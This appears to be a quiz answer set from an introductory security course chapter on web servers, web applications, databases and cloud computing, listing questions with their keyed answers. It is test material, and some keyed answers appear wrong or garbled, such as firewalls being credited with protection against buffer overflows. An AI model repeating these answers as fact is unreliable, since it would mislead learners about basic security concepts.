cct250 ch09 quiz
Which of the following statements is NOT true regarding Structured Query Language (SQL) injections?
They are specific to only one vendor's database and cannot force the application to reveal restricted information.
Input validation refers to restricting the type of input or data the website will accept so that mistakes will not be entered into the system.
True
Which of the following statements is NOT true regarding the protection of databases?
Very few tools are available to locate, audit, and ultimately protect databases.
Which of the following refers to encryption using short keys or keys that are poorly designed and implemented that can allow an attacker to decrypt data easily and gain unauthorized access to the information?
Weak ciphers or encoding algorithms
Hunter collected the following banner information from a web server in his environment. What type of information can he determine solely by analyzing this banner?
Web server version
Typical categories of databases include all of the following EXCEPT
applied database.
Offloading services from the local intranet to the Internet itself can be done by using:
cloud computing
Security issues that can arise in cloud computing that are above and beyond those with standard environments include all of the following EXCEPT:
detectability.
The categories of Web application vulnerabilities include all of the following EXCEPT:
end-user education.
Web applications that require a user to log on prior to gaining access can track information relating to improper or incorrect logons; this information typically lists entries such as all of the following EXCEPT:
entry of a valid user ID and password.
Browser do not display
hidden fields
Exploitative behaviors against Web applications include all of the following EXCEPT:
man-in-the-middle attacks
Common database vulnerabilities include the following except _
many audit log settings
NGSSquirreL and AppDetective are:
pieces of software for performing audits on databases
Which of the following challenges can be solved by firewalls?
protection against buffer overflows
NCC SQuirreL and AppDetectivePro are ________.
software tools for performing audits on databases
Common database vulnerabilities include all of the following EXCEPT:
strong audit log settings.
SQLPing and SQLRecon are:
tools for locating rogue or unknown database installations.
-- are scripting languages. (Select two)
-Javascript -PHP
Web applications are used to
Allow dynamic content
Common forms of distributed denial of service (DDoS) attacks include all of the following EXCEPT:
Buffer overflows
What type of attack relies on a variation of the input validation attack but has the goal of going after a user instead of the application or data.
Cross-site scripting (XSS)
Which of the following is a hierarchical, structured format for storing information for later retrieval, modification, management, and other purposes?
Database
Which category of risk inherent with Web servers includes risks such as the ability to steal information from a server, run scripts or executables remotely, enumerate servers, and carry out denial of service (DoS) attacks?
Defects and misconfiguration risks
Which class of individuals works the most with the server and is primarily concerned with access to content and services?
End user
A denial of service (DoS) attack is considered a critical problem because it is very difficult to defeat.
False
A distributed denial of service (DDoS) attack is mostly an annoyance; however, a denial of service (DoS) attack is much more of a problem.
False
Databases can be a victim of source code exploits.
False
Input validation is a result of SQL injections.
False
The stability of a web server does not depend on the operating system
False
Which web session vulnerability is directly associated with sessions that remain valid for periods longer than they are needed?
Long-lived sessions
-- is used to audit databases.
NCC SQuirreL
Which of the following is the best choice for storing and retrieving massive volumes of data in extremely short periods of time?
NoSQL database
Which cloud computing service model provides a virtual infrastructure and some preinstalled software components?
PaaS
Which of the following is NOT considered a vulnerability of Web servers?
Poor end-user training
-- can be caused by the exploitation of defects and code.
SQL injection
Which class of individuals is primarily concerned with the security of the Web server because it can provide an easy means of getting into the local network?
Server administrator
Which of the following refers to a language used to interact with databases, making it possible to access, manipulate, and change data?
Structured Query Language (SQL)